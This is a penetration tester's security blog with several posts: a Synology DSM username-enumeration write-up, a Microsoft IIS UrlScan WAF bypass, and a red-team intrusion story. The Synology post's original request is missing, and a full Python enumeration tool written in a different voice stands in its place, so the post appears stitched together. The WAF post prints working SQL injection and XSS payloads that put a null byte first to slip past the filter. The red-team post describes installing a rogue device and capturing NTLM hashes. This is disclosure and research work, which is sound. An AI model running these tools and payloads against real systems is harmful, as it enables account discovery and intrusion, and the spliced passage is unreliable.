Monday, January 8, 2018

Dear Diary - It's barely 2018 and skeletons are aplenty...

Excited to see how this Spectre and Meltdown patch madness will pan out; $10 says an engineer somewhere finger-flubs something, the debugger doesn't catch it, and it gets pushed to production distribution.

Meanwhile, I'm still waiting on meaningful exploit code beyond something that tells me whether I'm vulnerable or not.

In other news, I will be trying to post more here. Life is hard, but add blog stuff on top of that, plus work and family, and you probably have a better idea of my life than I do myself.

Expect more content; I have tons written up for consumption, but I need to sort through all the garbage that is my internal monologue dictating the narration in them.

That, and the non-stop quest not to rehash or regurgitate others' work. Once it's been done, there is no point in doing it again.

Discovery and the unknown are my two favorite friends, while chaos and curiosity continue to be my low-key friends. We'll explore all the closets I've encountered (minus the NDA ones) and hopefully provide something of value to the next person.

Unless you call yourself someone's "right hand person", you can stop right there...

Friday, January 5, 2018

CVE-2017-9554 - Synology DSM User Enumeration - Unspecified Vector... Yeah, right...

This was previously identified by the vendor, and the disclosure states only that it is possible to enumerate usernames via forget_passwd.cgi "via unspecified vectors".

I haven't found any other disclosure that actually identifies the attack vector, so I figure documenting it will be helpful to someone else.


Per the CVE:

"An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors."

Well then... Here you go, cracked the code and figured it out.


Where XXX is the injection point for your username list.

Several usernames I've found this way are admin, administrator, root, nobody, ftp, and more. I'm unsure whether Synology is pulling these entries from its passwd file or not, but there you go.
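As an added example (not the original post's request, which I have left as it appears above), here is a small response-differential harness for this kind of username enumeration. The CVE text gives the endpoint, forget_passwd.cgi, but neither the query parameter name nor the exact way a known and an unknown user's responses differ appears on this page, so the URL and parameter name are passed in as arguments, and the offline stand-in responses are constructed placeholders rather than DSM's real output. It learns the "unknown user" response from a random username first and then flags every candidate whose response fingerprint differs, refusing to guess if the baseline itself is unstable.

```python
#!/usr/bin/env python3
"""Response-differential username enumeration (added example, not the
original post's request). The endpoint path, parameter name and the
offline sample responses are assumptions / constructed placeholders."""
import hashlib
import secrets
import string
import sys
from typing import Callable, List, Tuple
from urllib import error, parse, request

Fetcher = Callable[[str], Tuple[int, bytes]]


def fingerprint(status: int, body: bytes) -> str:
    """Reduce a response to something comparable. Length alone misses
    same-length differences (e.g. a changed error code), so hash the body too."""
    return "%d:%d:%s" % (status, len(body), hashlib.sha256(body).hexdigest()[:16])


def random_username(n: int = 24) -> str:
    """A username that will not exist, used to learn the 'unknown user' response."""
    alphabet = string.ascii_lowercase + string.digits
    return "".join(secrets.choice(alphabet) for _ in range(n))


def enumerate_users(fetch: Fetcher, candidates: List[str]) -> List[str]:
    """Return the candidates whose response differs from the unknown-user baseline.

    Two baseline fetches guard against a response that varies per request
    (timestamps, tokens); there every candidate would look 'valid', so we
    refuse to guess rather than report garbage."""
    baseline = fingerprint(*fetch(random_username()))
    if fingerprint(*fetch(random_username())) != baseline:
        raise RuntimeError("unknown-user response is not stable; refine fingerprint()")
    return [u for u in candidates if fingerprint(*fetch(u)) != baseline]


def http_fetcher(url: str, param: str, timeout: float = 10.0) -> Fetcher:
    """GET <url>?<param>=<username>. The parameter name is an assumption;
    it is not documented on this page or in the CVE text."""
    def fetch(username: str) -> Tuple[int, bytes]:
        full = "%s?%s" % (url, parse.urlencode({param: username}))
        try:
            with request.urlopen(full, timeout=timeout) as resp:
                return resp.status, resp.read()
        except error.HTTPError as exc:  # a non-2xx still carries a body worth comparing
            return exc.code, exc.read()
    return fetch


# Constructed offline stand-in for the target; the bodies are invented
# placeholders, not DSM's real responses.
_FAKE_USERS = {"admin", "root", "nobody"}


def fake_fetcher(username: str) -> Tuple[int, bytes]:
    if username in _FAKE_USERS:
        return 200, b'{"success":true}'
    return 200, b'{"success":false}'


if __name__ == "__main__":
    # usage: enum.py http://<nas>/path/to/forget_passwd.cgi <param> [wordlist]
    default_words = ["admin", "administrator", "root", "nobody", "ftp"]
    if len(sys.argv) >= 3:
        fetch = http_fetcher(sys.argv[1], sys.argv[2])
        words = open(sys.argv[3]).read().split() if len(sys.argv) > 3 else default_words
    else:
        fetch, words = fake_fetcher, default_words
    print(enumerate_users(fetch, words))
```

Run without arguments it exercises the constructed stand-in; with a URL and parameter name it probes a live host. If a real target's unknown-user response carries per-request noise, extend fingerprint() to strip it before hashing rather than weakening the stability check.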


This is now published within ExploitDB

Wednesday, September 20, 2017

Identified My First Microsoft Product Exploit! IIS UrlScan WAF Bypass

#Paper Title: Microsoft IIS UrlScan Module Bypass Exploit
#Date: 16 AUG 2017
#Software Link:
#Author: Steven Kaun (Gh0st)
#Category: WAF Bypass

Identified after coming up empty when looking for help with bypassing a WAF identified as UrlScan. After finding that a web application was filtering, and essentially dropping, most attacks and their associated payloads, I dug into how to bypass it. This is about as simple as bypasses get, but at the same time it is unique enough to warrant writing about.


We all understand that WAFs are in place to identify and block malicious requests before they reach the application, so in effect I needed to figure out exactly what makes UrlScan tick, or how to make it tick for us. To that end, this came after exhaustive research into UrlScan and trying to see whether anyone had run across this in the professional or unethical realm. Well, you can guess how well that went.

Anyway... I've identified the IIS module "UrlScan 3.1" running on an IIS 6 machine (note that this could just as well be IIS 7.5, 6, 5, etc.). I've identified that the application is filtering certain characters, but I'm stuck, because whatever malicious requests I send get dropped or filtered by UrlScan anyway.


So after perusing developer forums, Microsoft technical documentation, and various sqlmap documentation and tamper methods, I had learned that appending %00 (a null byte) to the payload can be done with the tamper script "appendnullbyte". This, however, refused to work, and the UrlScan module picked it up right away. So what was I supposed to do? Well, apparently UrlScan doesn't know how to handle, or what to do, when the null byte is the prefix, and as far as I'm aware there is no sqlmap tamper script that performs this bypass.

So after formatting the sqlmap command with the real value of the parameter, I know that this page exists and has dynamic content that depends on the "users" integer value.

Original Unmodified

I quickly learned that the appendnullbyte tamper script only modifies the payload like this (note that this is just a generic payload): ' WAITFOR DELAY '0:0:10'--%00

So after analyzing the responses from the application, it seemed like it wouldn't take it at all... However, not all was lost: after more research into the matter, the solution became apparent when I found some random dev complaining about a UrlScan filter rule for %00 basically crashing their application. What I can extrapolate from that is that %00 is a null value (obvious), but more than that, I can deduce that %00 is not only not interpreted by UrlScan, it is completely overlooked, because there is a null value where UrlScan expects something.

Imagine, if you will, that you are an application looking for a value of anything greater than 0, but then you encounter 0. Would you simply stop interpreting it because, to you, there is nothing there? Well, if you said yes, you're in the same boat as UrlScan's logic, apparently.

The Attack

NOTE: Blogger removes URL-encoded null bytes from posts, so the null byte is written out below as Percent Zero Zero (%00).

So I've come to the conclusion that UrlScan expects some value to interpret or inspect, whether it be in the URL, a URL parameter, or the POST body. I've also come to understand that if the value is null, UrlScan simply ignores it on the basis that there is nothing to inspect, thus giving us the path towards carnage.

So here I am, at the end of the road... Will it work or not?

<valid value>%00' WAITFOR DELAY '0:0:10'--

IT WORKS! This little null value gave me the ability to perform SQL injection where SQL injection had failed time and time before.

This also allowed XSS in any arbitrary parameter I wanted:

<valid value>%00'><script>alert("XSS")</script>

REMEMBER: the null byte (%00) goes after the valid data but before the actual payload.


In the end I've learned the following...

1. UrlScan's logic is flawed in how it interprets null values: it expects 1, gets 0, and does not continue inspection.
2. This allows us to bypass UrlScan's logic to perform XSS and SQL injection where they would normally fail.
3. The %00 filtering within UrlScan breaks applications, for whatever reason.
4. sqlmap does not have a tamper script with which to bypass UrlScan; appendnullbyte can only append the null byte to the end of the payload, whereas this bypass requires it to be prepended.

Monday, August 28, 2017

Perimeter Security Sensors - Why "AND" sensor logic is bad...

Don't mind me, just a placeholder for now. I'll get more in-depth with a brief blog post on a security sensor I've encountered and how we beat it.

Thursday, August 17, 2017

Red Team Diaries #1 (Part 1 of 2) - Brief Synopsis? Or Obscure Dronings...

Good Morning!

So today I'll be writing about an obscure way I managed to get Domain Admin from a pretty strange attack chain.

It was back in the winter of 2016, and here in Minnesota that was probably the coldest winter I've experienced in a while (to the tune of a -40 °F wind chill). So there I was, working with our local news crew and fellow RedTeam members on trying to pick a client's exterior doors... Hands completely numb, shivering so hard I felt like I might as well have been dancing... Eventually we were defeated, but nevertheless we persisted in our efforts to attack their networks and business, at their request and to showcase our talents to the local media.

We had been foiled in the physical attacks; however, what was left was social engineering the employees in person... Believe it or not, SE can quite literally give you access to almost anything if you present a valid enough claim that you are with XYZ Internet service provider, completing a work order to perform maintenance due to connectivity issues.

To that extent, after gaining the trust of the employees, all it took was a few minutes in their server room to install a Raspberry Pi running Linux and a few tools from Kali, with a reverse SSH connection that would phone home. Suddenly there was no longer any need to try to phish the employees over the phone or through email attachments... We were in...

Soon after deploying the device, I got to work: started Nmap scripts, ran Responder, and started taking a look at Nmap's output as Responder slowly gathered hashed NTLM credentials via SMB and NBNS spoofing and responding. Well, it turns out we didn't need those credentials after all!

Stay tuned for Part 2! The next section will go over how a single printer gave us the "Keys to the Kingdom", for lack of better terminology beyond getting Domain Admin.

Wednesday, August 16, 2017

Figure it was that time...

In other words... stay tuned for some awesome blog posts regarding my experiences and whatnot in the world of hacking.

Personally, I'm not entirely sure how much I'll blog, but hell, the main reason I made this was to show the world new things and to release exploit development ideas and research I've done while at RedTeam Security and on my own time.

Moreover, I'll be showing some of the novel solutions to attacking things that not even my Google-fu could find answers to. So you can expect some rather novel solutions to attacking obscure services and applications :D